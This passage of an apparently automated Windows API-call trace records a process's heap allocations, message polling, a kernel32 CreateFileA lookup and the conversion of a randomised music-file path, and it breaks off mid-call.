hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0185.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.412] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.412] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0185.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0185.413] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.416] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0185.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.420] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd990 [0185.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd990, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.420] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0185.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0185.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.421] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0185.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0185.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0185.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5f) returned 0x9a5d78 [0185.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", cchWideChar=95, lpMultiByteStr=0x9a5d78, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS 